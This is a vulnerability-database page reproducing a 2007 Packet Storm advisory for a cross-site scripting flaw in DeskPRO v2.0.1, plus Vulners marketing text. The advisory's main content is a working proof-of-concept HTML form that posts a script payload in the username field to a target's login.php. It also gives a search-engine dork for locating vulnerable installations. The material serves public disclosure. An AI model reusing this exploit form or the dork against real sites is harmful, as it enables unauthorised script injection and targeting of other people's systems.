Lucene search
K

deskpro201-xss.txt

🗓️ 10 Apr 2007 00:00:00Reported by John MartinelliType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability discovered by John Martinelli on April 8th, 200

Code
`<!--  
  
DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability  
  
Vulnerable: DeskPRO v2.0.1 (other versions should also be vulnerable)  
Google d0rk: intitle:"Powered by DeskPRO"  
  
John Martinelli  
[email protected]  
http://john-martinelli.com  
  
April 8th, 2007  
  
!-->  
  
<html>  
<head><title>DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability</title><body>  
  
<center><br><br><font size=4>DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a></font><br>  
  
<br><br>  
<form action="http://target.com/login.php" method="post">  
<input type=hidden name="login_form" value="login">   
<input type=hidden name="_getvars" value="getvars">   
<input type=hidden name="_postvars" value="postvars">  
<input type=hidden name="_filevars" value="filevars">  
<input type=hidden name="password" value="password">  
<input type=hidden name="remember" value=0>  
<input name="username" size=75 value="<"<<script>alert(1);</script>">  
<input type=submit value="Execute XSS Attack" class="button">  
</form>  
  
</body></html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation